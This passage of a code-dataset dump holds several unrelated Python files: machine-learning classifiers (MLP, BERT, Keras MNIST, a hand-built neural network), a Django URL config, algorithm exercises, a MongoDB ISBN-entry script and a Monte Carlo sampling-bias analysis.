saved\")\r\nparser.add_argument(\"--src_embedding\", default=\"wmt20-sent.en-ha.ha.xlmr\", help=\"source embedding to use for training. Note: Change loading based on encoder\")\r\nparser.add_argument(\"--tgt_embedding\", default=\"wmt20-sent.en-ha.en.xlmr\", help=\"target embedding to use for training. Note: Change loading based on encoder\")\r\nparser.add_argument(\"--neg_src\", default=\"neg-1.txt\", help=\"file with negative samples generated using source language\")\r\nparser.add_argument(\"--neg_tgt\", default=\"neg-2.txt\", help=\"file with negative samples generated using target language\")\r\nargs = parser.parse_args()\r\n\r\n\r\n\r\n#load embeddings stored in theform of a dictionary\r\nf = open(args.tgt_embedding,\"r\")\r\nendict = [np.array(list(map(float,i.lstrip().rstrip().split(' ')))) for i in f]\r\nf.close()\r\nf = open(args.src_embedding,\"r\")\r\npsdict = [np.array(list(map(float,i.lstrip().rstrip().split(' ')))) for i in f]\r\nf.close()\r\n\r\n\r\n#get previous iteration's scores along with the positive samples's indexes\r\nf = open(args.previous_scores,\"r\")\r\nsc = [float(i.rstrip().lstrip()) for i in f]\r\nsc = np.nonzero(sc)[0][args.starting_rank:args.ending_rank]\r\n\r\nX7 = [list(psdict[int(i)])+list(endict[int(i)]) for i in sc]\r\ny7 = [1 for i in range(len(X7))]\r\nf.close()\r\n\r\n\r\n\r\n#get the negative samples associated with the positive samples\r\n\r\nX3 = [list(psdict[i-1])+list(endict[i-1]) for i in sc]\r\nX4 = [list(psdict[i+1])+list(endict[i+1]) for i in sc]\r\ny3 = [0 for i in range(len(X3))]\r\ny4 = [0 for i in range(len(X4))]\r\n\r\nf = open(args.neg_src,\"r\")\r\nX1 = [list(psdict[int(i.split(',')[1].lstrip())])+list(endict[int(i.split(',')[0].rstrip())]) for i in f]\r\ny1 = [0 for i in range(len(X3))]\r\nf.close()\r\nprint(\"here4\")\r\n\r\nf = open(args.neg_tgt,\"r\")\r\nX2 = [list(psdict[int(i.split(',')[0].lstrip())])+list(endict[int(i.split(',')[1].rstrip())]) for i in f]\r\ny2 = [0 for i in range(len(X4))]\r\nf.close()\r\nprint(\"here5\")\r\n\r\n#f = open(\"pos-1.txt\",\"r\")\r\n#X5 = [list(psdict[int(i.split(',')[1].lstrip())])+list(endict[int(i.split(',')[0].rstrip())]) for i in f]\r\n#y5 = [0 for i in 
range(len(X5))]\r\n#f.close()\r\n#print(\"here6\")\r\n#f = open(\"pos-2.txt\",\"r\")\r\n#X6 = [list(psdict[int(i.split(',')[0].lstrip())])+list(endict[int(i.split(',')[1].rstrip())]) for i in f]\r\n#y6 = [0 for i in range(len(X6))]\r\n\r\n\r\n\r\n#combine the positive and negative samples to get training data and make sure that we don't have sentences with an invalid embedding (due to a max size limit on xlmr)\r\nX = X1 + X2 + X3 + X4\r\ny = y1 + y2 + y3 + y4\r\nt = int(len(X)/len(X7))\r\nfor i in range(t):\r\n X = X + X7\r\n y = y + y7\r\nfor i in range(len(X)):\r\n# print(i)\r\n if len(X[i]) != 2048:\r\n del X[i]\r\n del y[i]\r\n\r\n\r\n\r\n\r\n#actually do the training and save the results\r\ntry:\r\n clf = pickle.load(open(args.model_name, 'rb'))\r\n clf.fit(X,y)\r\nexcept:\r\n clf = MLPClassifier(random_state=1, verbose = True, early_stopping=False, warm_start = True, learning_rate=\"invscaling\", learning_rate_init=0.00002, max_iter=1000, hidden_layer_sizes=(2048,2048,2048,2048,)).fit(X, y)\r\ntry:\r\n pickle.dump(clf, open(args.model_name,\"wb\"))\r\nexcept:\r\n c = 0\r\nf = open(args.current_scores,\"w\")\r\nfor i in range(len(psdict)):\r\n t = list(psdict[int(i)])+list(endict[int(i)])\r\n if len(t) != 2048:\r\n f.write(\"0\")\r\n f.write(\"\\n\")\r\n else:\r\n f.write(str(clf.predict_proba(np.array(t).reshape(1,-1))[0][1]))\r\n f.write(\"\\n\")\r\n","sub_path":"Scikit-version/classifier2.py","file_name":"classifier2.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422819597","text":"from django.conf.urls import patterns, include, url\nfrom django.conf import settings\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'django_apps.views.home', name='home'),\n # url(r'^django_apps/', include('django_apps.foo.urls')),\n\n\turl(r'^inventory/', include('inventory.urls')),\n\turl(r'^bookstore/', include('bookstore.urls')),\n\t\n # Uncomment the admin/doc line below to enable admin documentation:\n\turl(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n \n # Static files (FOR DEVELOPMENT ONLY!)\n (r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.STATIC_ROOT}),\n)\n\n#if settings.DEBUG:\n#\turlpatterns += patterns('django.contrib.staticfiles.views', url(r'^static/(?P.*)$', 'serve'),)\n","sub_path":"django_apps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365834144","text":"class Solution(object):\n def threeSum(self, nums):\n if len(nums) < 3:\n return []\n result = []\n nums.sort()\n \n for i in range(len(nums)):\n target = 0 - nums[i]\n dic = {}\n for j in range(i+1, len(nums)):\n if target - nums[j] in dic:\n temp = [nums[i], target - nums[j], nums[j]]\n if temp not in result:\n result.append(temp)\n else:\n dic[nums[j]] = j\n return result","sub_path":"Array/3Sum.py","file_name":"3Sum.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557868964","text":"'''\nFile name: nuralNetwork.py\n Implemetation of a Neural Network, without using external NN libraries.\n \nAuthor: Vasileios Saveris\nenail: 
vsaveris@gmail.com\n\nLicense: MIT\n\nDate last modified: 01.12.2019\n\nPython Version: 3.6\n'''\n\nimport numpy as np\n\nclass NeuralNetwork():\n '''\n Neural Network object.\n\n Args:\n input_nodes (int): \n The size of the input layer of the ANN\n hidden_nodes (int): \n The size of the hidden layer of the ANN\n output_nodes (int): \n The size of the output layer of the ANN\n learning_rate (float): \n The learning rate in (0, 1]\n \n Attributes:\n input_nodes (int): \n The size of the input layer of the ANN\n hidden_nodes (int): \n The size of the hidden layer of the ANN\n output_nodes (int): \n The size of the output layer of the ANN\n lr (float): \n The learning rate in (0, 1]\n activation_function (function):\n The activation function of the ANN (sigmoid)\n weights_input_to_hidden (numpy array 2D): \n The wights from the input to the hidden layer.\n weights_hidden_to_output (numpy array 2D): \n The wights from the hidden to the output layer.\n \n Methods:\n train():\n Train the network on batch of features and targets. \n __feedForwrad():\n Implement feed forward, calculate the hidden layer and final outputs\n __backpropagation():\n Backpropagation implementation.\n __update_weights():\n Update weights on gradient descent step.\n predict:\n Run a forward pass through the network with input features and return\n a prediction.\n '''\n\n def __init__(self, input_nodes, hidden_nodes, output_nodes, learning_rate):\n '''\n Class constructor.\n\n Args:\n input_nodes (int): \n The size of the input layer of the ANN\n hidden_nodes (int): \n The size of the hidden layer of the ANN\n output_nodes (int): \n The size of the output layer of the ANN\n learning_rate (float): \n The learning rate in (0, 1]\n\n Raises:\n -\n\n Returns:\n -\n '''\n\n # Set number of nodes in input, hidden and output layers.\n self.input_nodes = input_nodes\n self.hidden_nodes = hidden_nodes\n self.output_nodes = output_nodes\n\n # Initialize weights\n self.weights_input_to_hidden = np.random.normal(0.0, self.input_nodes**-0.5, \n (self.input_nodes, self.hidden_nodes))\n\n self.weights_hidden_to_output = np.random.normal(0.0, self.hidden_nodes**-0.5, \n (self.hidden_nodes, self.output_nodes))\n self.lr = learning_rate\n \n # Set self.activation_function to the sigmoid\n self.activation_function = lambda x : 1/(1+np.exp(-x))\n \n\n def train(self, features, targets):\n '''\n Train the network on batch of features and targets. 
\n\n Args:\n features (numpy array 2D): \n Each row is one data record, each column is a feature\n targets (numpy array 1D): \n Target values\n \n Raises:\n -\n\n Returns:\n -\n '''\n \n n_records = features.shape[0]\n delta_weights_i_h = np.zeros(self.weights_input_to_hidden.shape)\n delta_weights_h_o = np.zeros(self.weights_hidden_to_output.shape)\n \n for X, y in zip(features, targets):\n \n final_outputs, hidden_outputs = self.__feedForwrad(X)\n\n delta_weights_i_h, delta_weights_h_o = self.__backpropagation(final_outputs, hidden_outputs, X, y, \n delta_weights_i_h, delta_weights_h_o)\n self.__update_weights(delta_weights_i_h, delta_weights_h_o, n_records)\n\n\n def __feedForwrad(self, X):\n '''\n Implement feed forward, calculate the hidden layer and final outputs\n\n Args:\n X (numpy array 2D): \n Each row is one data record, each column is a feature\n\n Raises:\n -\n\n Returns:\n final_outputs (numpy array 2D): \n Signals from final output layer\n hidden_outputs (numpy array 2D): \n Signals from hidden layer\n '''\n\n # Hidden layer\n hidden_inputs = np.dot(X, self.weights_input_to_hidden) # signals into hidden layer\n hidden_outputs = self.activation_function(hidden_inputs) # signals from hidden layer\n\n # Output layer\n final_inputs = np.dot(hidden_outputs, self.weights_hidden_to_output) # signals into final output layer\n final_outputs = final_inputs # signals from final output layer, the activation function is f(x) = x\n \n return final_outputs, hidden_outputs\n\n\n def __backpropagation(self, final_outputs, hidden_outputs, X, y, delta_weights_i_h, delta_weights_h_o):\n '''\n Backpropagation implementation.\n\n Args:\n final_outputs: \n output from forward pass\n y: \n target (i.e. label) batch\n delta_weights_i_h: \n change in weights from input to hidden layers\n delta_weights_h_o: \n change in weights from hidden to output layers\n\n Raises:\n -\n\n Returns:\n delta_weights_i_h (float): \n Weight step (input to hidden)\n delta_weights_h_o (float): \n Weight step (hidden to output)\n '''\n\n # Output error\n # Output layer error is the difference between desired target and actual output.\n error = y - final_outputs\n\n # activation function of the output layer is f(x) = x, where f'(x) = 1\n output_error_term = error * 1.\n\n # Calculate the hidden layer's contribution to the error\n hidden_error = np.dot(self.weights_hidden_to_output, output_error_term)\n hidden_error_term = hidden_error * hidden_outputs * (1-hidden_outputs)\n\n # Weight step (input to hidden)\n delta_weights_i_h += X[:, None] * hidden_error_term\n\n # Weight step (hidden to output)\n delta_weights_h_o += output_error_term[:,None] * hidden_outputs[:, None]\n\n return delta_weights_i_h, delta_weights_h_o\n\n\n def __update_weights(self, delta_weights_i_h, delta_weights_h_o, n_records):\n '''\n Update weights on gradient descent step.\n\n Args:\n delta_weights_i_h: \n Change in weights from input to hidden layers\n delta_weights_h_o: \n Change in weights from hidden to output layers\n n_records: \n Number of records\n\n Raises:\n -\n\n Returns:\n -\n '''\n\n # update hidden-to-output weights with gradient descent step\n self.weights_hidden_to_output += self.lr*delta_weights_h_o/n_records\n\n # update input-to-hidden weights with gradient descent step\n self.weights_input_to_hidden += self.lr*delta_weights_i_h/n_records\n\n\n def predict(self, features):\n '''\n Run a forward pass through the network with input features and return\n a prediction.\n\n Args:\n features (numpy array 2D): \n Each row is one data 
record, each column is a feature\n\n Raises:\n -\n\n Returns:\n prediction (numpy array 1D): \n Predictions for the input data.\n '''\n\n return self.__feedForwrad(features)[0]","sub_path":"project_ann/neuralNetwork.py","file_name":"neuralNetwork.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540950390","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data as mnist_data\n#keras api\nfrom tensorflow.python.keras.models import *\nfrom tensorflow.python.keras import Input\nfrom tensorflow.python.keras import layers\nfrom tensorflow.python.keras import optimizers\n\nprint(\"Tensorflow version \" + tf.__version__)\n\n# Download images and labels into mnist.test (10K images+labels) and mnist.train (60K images+labels)\nmnist = mnist_data.read_data_sets(\"data\", one_hot=True, reshape=False, validation_size=0)\n\nprint(\"train examples\", mnist.train.num_examples)\nprint(\"test examples\", mnist.test.num_examples)\n\ni_size = 28\nl1_size = 200\nl2_size = 100\nl3_size = 60\nl4_size = 30\no_size = 10\n\nbatch = 100\nepochs = 20\n\ninputs = Input((i_size, i_size, 1), name=\"input_data\")\nreshape = layers.Reshape((i_size * i_size,))(inputs)\noutputs = layers.Dense(l1_size, activation=tf.nn.relu, name=\"layer1\")(reshape)\noutputs = layers.Dense(l2_size, activation=tf.nn.relu, name=\"layer2\")(outputs)\noutputs = layers.Dense(l3_size, activation=tf.nn.relu, name=\"layer3\")(outputs)\noutputs = layers.Dense(l4_size, activation=tf.nn.relu, name=\"layer4\")(outputs)\noutputs = layers.Dense(o_size, activation=tf.nn.softmax, name=\"layer5\")(outputs)\n\nmodel = Model(inputs=inputs, outputs=outputs)\n\nmodel.compile(optimizer=optimizers.Adagrad(0.003),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\ncb_tensorboard = tf.keras.callbacks.TensorBoard(log_dir='./summary/nn5', histogram_freq=1, write_grads=True, \\\n write_graph=True, write_images=True)\n\nmodel.fit(x=mnist.train.images, y=mnist.train.labels, \\\n batch_size=batch, epochs=epochs, validation_data=(mnist.test.images, mnist.test.labels), \\\n callbacks=[cb_tensorboard]) # starts training\n\n#test\nprint(\"test:\")\nresult = model.evaluate(x=mnist.test.images,\n y=mnist.test.labels)\n\n# all model performance metrics for test\nfor name, value in zip(model.metrics_names, result):\n print(name, value)\n\nmodel.save(\"./save/nn5.h5\")\n","sub_path":"mnist_k_nn5.py","file_name":"mnist_k_nn5.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"107299294","text":"import os\nimport pandas as pd\nimport numpy as np\nimport itertools\n\nfrom numba import njit, guvectorize\n\n\nclass OutputTable(object):\n def __init__(self, out_dir, sampling_method, imputation_method, snap, quantiles, stats_intervals):\n # Initialize path\n self.dir = out_dir\n self.base = \"bf_results_{}_{}_{}.csv\".format(sampling_method, imputation_method, snap)\n self.path = os.path.join(self.dir, self.base)\n self.quantiles = quantiles\n self.intervals = stats_intervals\n\n # Initialize header\n self.header = [\"Site\", \"Year\", \"Sample Interval\", \"Realization\"] + \\\n [\"{}-day Bias Factor\".format(interval) for interval in stats_intervals] + \\\n [\"{}P {}\".format(quantile, var) for var in (\"Slope\", \"RMSE\") for quantile in quantiles]\n\n # Initialize file\n self.initialize_table()\n\n def initialize_table(self):\n # Create output 
directory if it does not exist\n if not os.path.exists(self.dir):\n os.mkdir(self.dir)\n\n # Create file and write header\n with open(self.path, 'w') as f:\n f.write(\",\".join(self.header) + \"\\n\")\n\n def update_table(self, site, year, sample_interval, realization, bias_factors, slopes, residuals):\n \"\"\" Insert run results into table \"\"\"\n # Arrange data into row\n out_data = [site, year, sample_interval, realization] + list(bias_factors) + list(slopes) + list(residuals)\n\n # Update file\n with open(self.path, 'a') as f:\n f.write(\",\".join(map(str, out_data)) + \"\\n\")\n\n\ndef check_inputs(chemograph_dir, sampling_intervals, start_date):\n # Ensure quarterly sampling\n assert all(1 <= sampling_interval <= 90 for sampling_interval in sampling_intervals), \\\n \"Sampling interval must be between 1 and 90\"\n assert start_date[0] <= 3, \"Start date must be prior to April 1\"\n\n # Check to see if input files exist\n assert os.path.exists(chemograph_dir), \"Directory {} does not exist\".format(chemograph_dir)\n\n\ndef compile_strategies(sampling, imputation, snap):\n \"\"\" This function compiles valid combinations of all run parameters \"\"\"\n valid_fields = [(\"sample selection\", sampling, [\"random\", \"stratified\"]),\n (\"imputation\", imputation, [\"linear\", \"log_linear\", \"stair\"]),\n (\"snap\", snap, [\"yes\", \"no\"])]\n\n output_sets = []\n for label, strategy, strategies in valid_fields:\n assert strategy in strategies + [\"all\"], \\\n \"{} strategy must be '{}', or 'all'\".format(label, \"', '\".join(strategies))\n output_sets.append((strategy,) if strategy != 'all' else strategies)\n\n combinations = list(itertools.product(*output_sets))\n for i, invalid_set in enumerate(filter(lambda x: x[0] == \"random\" and x[2] == \"yes\", combinations)):\n if not i:\n print(\"Cannot run random sampling with date snap\")\n combinations.remove(invalid_set)\n\n assert len(combinations) > 0, \"No valid combinations of sampling method, imputation method, and snapping provided\"\n\n return combinations\n\n\n@guvectorize(['void(float64[:], float64[:, :], float64[:], float64[:])'], '(n),(o, n),(p)->(p)')\ndef compute_bias_factor(chemograph, simulated_chemographs, stats_intervals, results):\n # Loop through intervals\n for i in range(stats_intervals.size):\n stats_interval = stats_intervals[i]\n\n # Get the max moving-window mean value from the chemograph\n true_value = max_mean(chemograph, stats_interval)\n\n # Get the max moving-window mean for each of the 10,000 simulations\n sampling_values = np.zeros(simulated_chemographs.shape[0])\n for j in range(simulated_chemographs.shape[0]):\n sampling_values[j] = max_mean(simulated_chemographs[j], stats_interval)\n\n # The bias factor is chemograph max-mean divided by the 5th percentile simulation max-mean\n p5 = np.percentile(sampling_values, 5).round(10)\n results[i] = true_value / p5\n\n\n@njit\ndef interpolate(chemograph, n_simulations, n_periods, sampling_interval, tail, sample_method, imputation_method, snap):\n \"\"\" Generate a set of 10,000 simulated chemographs based on random sampling \"\"\"\n\n # Initialize the output array\n results = np.zeros((n_simulations, chemograph.size)) - 1\n\n # If doing log-linear imputation, log-transform the chemograph\n if imputation_method == 3:\n chemograph = np.log10(chemograph)\n\n # Generate sample period boundaries for use if using stratified sampling\n if sample_method > 0:\n sample_periods = np.arange(0, chemograph.size, sampling_interval)\n\n # Iterate simulations\n for i in 
range(n_simulations):\n\n # Set sampling dates\n if sample_method == 1: # random\n sample_dates = np.sort(np.random.choice(chemograph.size, n_periods + 1, replace=False))\n else: # stratified\n sample_dates = sample_periods + np.random.randint(0, sampling_interval, sample_periods.shape)\n\n # bound upper sample to be less than 365. only affects stair-step (JCH - when does this happen?)\n if sample_dates[-1] > 364:\n sample_dates[-1] = 364\n\n # Iterate sampling dates\n for j in range(n_periods - 1):\n if snap: # assign the sampled value to the first day in the period\n period_start, period_end = j * sampling_interval, ((j * sampling_interval) + sampling_interval)\n else: # don't do that\n period_start, period_end = sample_dates[j], sample_dates[j + 1]\n\n start_val = chemograph[sample_dates[j]]\n end_val = chemograph[sample_dates[j + 1]]\n\n # Iterate days in sampling period\n for k in range(period_start, period_end + 1):\n if imputation_method == 1: # stair step\n results[i, k] = start_val\n if k == period_end:\n break\n else:\n day = k - period_start\n if imputation_method == 2: # linear\n results[i, k] = start_val + ((end_val - start_val) / (period_end - period_start)) * day\n if imputation_method == 3: # log-linear\n results[i, k] = 10 ** (start_val + ((end_val - start_val) / (period_end - period_start)) * day)\n\n # Extend values across last period if not interpolating\n if imputation_method == 1 and sample_method == 2 and snap == 1:\n if chemograph.size - period_end > sampling_interval:\n for k in range(sampling_interval):\n results[i, period_end + k] = chemograph[sample_dates[-2]]\n\n for k in range(tail):\n results[i, period_end + sampling_interval + k] = chemograph[sample_dates[-1]]\n\n return results\n\n\n@njit\ndef max_mean(chemograph, stats_interval):\n \"\"\" Use a moving window to get a series of sample means and return the maximum \"\"\"\n maximum = 0\n for j in range(chemograph.size - stats_interval + 1):\n window_total = 0\n window_count = 0\n for k in range(stats_interval):\n value = chemograph[j + k]\n if value >= 0:\n window_total += value\n window_count += 1\n if window_count > 0:\n window_mean = window_total / window_count\n if window_mean > maximum:\n maximum = window_mean\n return maximum\n\n\ndef percentiles(values, quantiles):\n return [np.percentile(values, quantile) for quantile in quantiles]\n\n\n@njit\ndef process_residuals(simulated_chemographs, chemograph):\n \"\"\" Calculate slopes in a batch \"\"\"\n n_repetitions = simulated_chemographs.shape[0]\n slope, rmse = np.zeros(n_repetitions), np.zeros(n_repetitions)\n for i in range(simulated_chemographs.shape[0]):\n\n # Initialize the x and y arrays to feed to the linear regression function\n x = np.ones((chemograph.size, 2))\n residual = np.zeros(chemograph.size)\n\n # Loop through each day in chemograph, get residual and add to x, y arrays if the value > 0 (not no-data)\n index = 0\n for j in range(chemograph.size):\n simulated_value = simulated_chemographs[i, j]\n if simulated_value >= 0:\n x[index, 0] = j\n residual[index] = chemograph[j] - simulated_value\n index += 1\n\n slope[i] = np.linalg.lstsq(x[:index], residual[:index])[0][0] # linear regression function\n rmse[i] = np.sqrt((residual[:index] ** 2).mean()) # RMSE function\n\n return slope, rmse\n\n\ndef print_chemographs(chemograph, simulated_chemographs, site_id, n=10):\n \"\"\" Write sampled chemographs to file for QC purposes \"\"\"\n\n out_dir = os.path.join(\"QC\") # CAP - os.path.join(\"..\", \"usgs files\", \"atrazine\")\n outfile = 
os.path.join(out_dir, site_id + \"chemograph.csv\")\n sample = pd.DataFrame(data=np.vstack([chemograph, simulated_chemographs[:n]]).T)\n sample.to_csv(outfile)\n\n\ndef process_chemograph(chemograph, n_simulations, sampling_interval, quantiles,\n sampling_method, imputation_method, snap, stats_intervals,\n site=None, write_chemographs=False, qc_n=10):\n \"\"\" The main routine: generate 10,000 simulations, and calculate bias factors and such \"\"\"\n\n # numba compiled functions (interpolate) don't take strings: convert methods to numbers\n sample_method = {'random': 1, 'stratified': 2}[sampling_method]\n imputation_method = {'stair': 1, 'linear': 2, 'log_linear': 3}[imputation_method]\n snap = {'yes': 1, 'no': 0}[snap]\n stats_intervals = np.array(stats_intervals)\n\n # The number of sampling periods in a year, and the length of the last incomplete period\n n_periods, tail = divmod(chemograph.size, sampling_interval)\n\n # Generate randomly-sampled chemograph simulations\n simulated_chemographs = interpolate(chemograph, n_simulations, n_periods, sampling_interval, tail,\n sample_method, imputation_method, snap)\n\n # Print out chemograph and simulated chemographs to QC\n if write_chemographs:\n print_chemographs(chemograph, simulated_chemographs, site, qc_n)\n\n # Get slopes of input and simulated chemographs\n simulated_slopes, simulation_residuals = process_residuals(simulated_chemographs, chemograph)\n\n # Calculate bias factors\n bias_factors = compute_bias_factor(chemograph, simulated_chemographs, stats_intervals)\n\n return percentiles(simulated_slopes, quantiles), percentiles(simulation_residuals, quantiles), bias_factors\n\n\ndef read_chemographs(chemograph_dir, start_date=(1, 1), end_date=(12, 31)):\n # Loop through chemograph files\n for f in filter(lambda x: x.endswith(\".txt\"), os.listdir(chemograph_dir)):\n\n # Load tables\n site_name = f.rstrip(\".csv\")\n table_path = os.path.join(chemograph_dir, f)\n table = pd.read_csv(table_path, sep=\"\\t\")\n\n # Initialize date index and filter out dates outside the specified range\n dates = pd.DatetimeIndex(table.date) # JCH - originally coerces dtype to np.datetime64 - not necessary?\n\n # Adjust dates if manual start or end dates are used\n if start_date != (1, 1) or end_date != (12, 31):\n (start_month, start_day), (end_month, end_day) = start_date, end_date\n date_filter = ((dates.month > start_month) | ((dates.month == start_month) & (dates.day >= start_day))) & \\\n ((dates.month < end_month) | ((dates.month == end_month) & (dates.day <= end_day)))\n table = table[date_filter]\n dates = dates[date_filter]\n\n # Iterate through years to get site-year tables\n chemograph_fields = [f for f in table.columns if f.startswith(\"csim\")]\n for year in sorted(np.unique(dates.year)):\n yield site_name.rstrip(\".txt\"), year, table[dates.year == year][chemograph_fields].T.as_matrix()\n\n\ndef main():\n # Data paths\n chemograph_dir = os.path.join(\"AtzRockV2100\") # CAP - os.path.join(\"..\", \"usgs_files\", \"atrazine\")\n output_dir = os.path.join(\"AtzRockV2100\",\"Output\") # CAP - os.path.join(\"..\", \"usgs_files\", \"atrazine\", \"Output\")\n\n # Parameters\n stats_intervals = [1, 4, 7, 21, 60, 90] # any positive number between 1 and 90\n start_date = (1, 1) # date to pick first sample from, must be before Mar 31 (ensures we have at least quarterly)\n end_date = (12, 31)\n sampling_strategy = \"random\" # can be 'random', 'stratified', or 'all'\n imputation = \"log_linear\" # can be 'linear', 'log_linear', or 'stair'\n snap = 
\"no\" # can be \"yes\", \"no\", or \"both\"\n n_simulations = 10000 # number of random samples\n sampling_intervals = [7, 14, 21, 28]\n quantiles = (0.1, 10, 50, 90, 99.9)\n\n # Diagnostic\n qc_mode = False # If True, will write sampled chemographs to file\n qc_sample = 10 # Number of sample chemographs to be written if QC mode is on\n\n \"\"\" All path and parameter variables are set before this line. The rest is program functionality \"\"\"\n\n # Inspect inputs and get all combinations of run parameters\n check_inputs(chemograph_dir, sampling_intervals, start_date)\n strategies = compile_strategies(sampling_strategy, imputation, snap)\n\n # Iterate through all combinations of sampling, imputation, and snap methods\n for sampling_method, imputation_method, snap in strategies:\n\n # Iterate through all 50 or so chemographs for the site\n output = OutputTable(output_dir, sampling_method, imputation_method, snap, quantiles, stats_intervals)\n\n # Iterate through sampling intervals:\n for sampling_interval in sampling_intervals:\n\n # Loop through each site-year and process\n for site, year, chemographs in read_chemographs(chemograph_dir, start_date, end_date):\n\n # Loop through all chemographs in file\n for i, chemograph in enumerate(chemographs):\n print(\"Processing {}, {}, {}-day {} sampling, {} imputation, {} snap, simulation #{} ...\".format(\n site, year, sampling_interval, sampling_method, imputation_method, snap, i + 1))\n\n # Analyze the chemograph and perform Monte Carlo sampling\n slopes, residuals, bias_factors = \\\n process_chemograph(chemograph, n_simulations, sampling_interval, quantiles,\n sampling_method, imputation_method, snap, stats_intervals,\n site=\"{}_{}\".format(site, i), write_chemographs=qc_mode, qc_n=qc_sample)\n\n # Write results to output table\n output.update_table(site, year, sampling_interval, i+1, bias_factors, slopes, residuals)\n\n\nmain()\n","sub_path":"bias-factors/code/ncg_merge.py","file_name":"ncg_merge.py","file_ext":"py","file_size_in_byte":14819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319024297","text":"import pymongo\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nfrom bson.json_util import dumps\nimport json\nimport time\nfrom random import choice\nfrom string import ascii_uppercase\n\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\n\nclient = MongoClient('localhost',27017)\nprint(\"Connected to database\")\n\ndb = client.lounge_library\ncollection = db.lounge_library_isbn_10\n\nwhile True:\n\tnew_num = input(\"Enter an ISBN; \")\n\tcheck_sum = new_num[9]\n\tif (len(new_num) == 10):\n\t\tadd = False\n\t\tnum = 0\n\t\tfor i in range(1, 10):\n\t\t\tnum += (int(new_num[i - 1]) * i)\n\n\t\tif (new_num[9] == 'x' and num % 11 == 10):\n\t\t\tdocument = {\n\t\t\t\t'isbn': new_num\n\t\t\t}\n\t\t\tcollection.insert_one(document)\n\t\telif (num % 11 == int(new_num[9])):\n\t\t\tdocument = {\n\t\t\t\t'isbn': new_num\n\t\t\t}\n\t\t\tcollection.insert_one(document)\n\t\telse:\n\t\t\tprint(\"Bad Checksum\")\n\telse:\n\t\tprint(new_num + \" is not a valid ISBN\")","sub_path":"add-books.py","file_name":"add-books.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564550523","text":"\n# 最长上升子序列 300\n\nfrom typing import List\n\n\nclass Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n dp = [1 for i in len(nums)]\n for i in range(len(nums)):\n for j in 
range(i):\n                if nums[j] < nums[i]:\n                    dp[i] = max(dp[i], dp[j]+1)\n\n        return max(dp)\n\n\nclass Solution1:\n    def lengthOfLIS(self, nums: List[int]) -> int:\n        # base case\n        dp = [1 for i in range(len(nums))]\n        for i in range(len(nums)):\n            for j in range(i):\n                if nums[j] < nums[i]:\n                    dp[i] = max(dp[i], dp[j]+1)\n        return max(dp)\n\n\nnums = [10, 9, 2, 5, 3, 7, 101, 18]\n\nnums = [1, 2, 4, 3, 5, 4, 7, 2]\ns = Solution1()\nprint(s.lengthOfLIS(nums))\n\n\n\n\n\n\n\n\n\n","sub_path":"dynamic/longest_common_subsequence/longest_increase_subsequence_300.py","file_name":"longest_increase_subsequence_300.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157570934","text":"import torch \nimport torch.nn as nn \nfrom networks.bertmodel.bertmodel import BertModel\nfrom networks.weights.load_weights_from_s3 import load_weights_from_s3\n\n\nclass BertForIMDBClassification(nn.Module):\n    def __init__(self, config, tag_size=2):\n        '''BertModel adapted to produce classification outputs'''\n        super(BertForIMDBClassification, self).__init__()\n        # train on top of BertModel's pre-trained parameters;\n        # load the pre-trained weights at initialization\n        bert = BertModel(config)\n        bert.eval()\n        param_name = []\n        for name, param in bert.named_parameters():\n            param_name.append(name)\n\n        bert_state_dict = bert.state_dict()\n        loaded_model_dict = load_weights_from_s3()\n        for i, (k, v) in enumerate(loaded_model_dict.items()):\n            name = param_name[i]\n            bert_state_dict[name] = v \n\n            if i+1 >= len(param_name):\n                break \n        bert.load_state_dict(bert_state_dict)\n        # freeze the BERT weights so they are not updated during training\n        for param in bert.parameters():\n            param.requires_grad = False \n\n        self.bert = bert \n\n        self.fc = nn.Linear(config.hidden_size, tag_size)\n        # initialize the last linear layer weights \n        nn.init.normal_(self.fc.weight, std=.02)\n        nn.init.normal_(self.fc.bias, 0)\n\n    def forward(self, input_ids, token_type_ids, mask=None, attention_flg=False):\n        if attention_flg:\n            output_bert, weights = self.bert(input_ids, token_type_ids, mask, attention_flg=True)\n            # 4 layers \n            output = self.fc(output_bert)\n            return output, weights \n        else:\n            output_bert = self.bert(input_ids, token_type_ids, mask)\n            output = self.fc(output_bert)\n            return output","sub_path":"models/bert/networks/.ipynb_checkpoints/classifier_net-checkpoint.py","file_name":"classifier_net-checkpoint.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311196342","text":"'''\r\nCreated on 2014-3-19\r\n\r\n@author: Walter\r\n'''\r\n\r\nfrom Swarm import *\r\n\r\nif __name__ == '__main__':\r\n    \r\n    def Griewank(X):\r\n        val = 0.0\r\n        for d in range(30):\r\n            val += X[0,d]**2 \r\n        val /= 4000.0\r\n        # product term of the standard Griewank function; start the product at 1\r\n        # and use sqrt(d + 1) so the 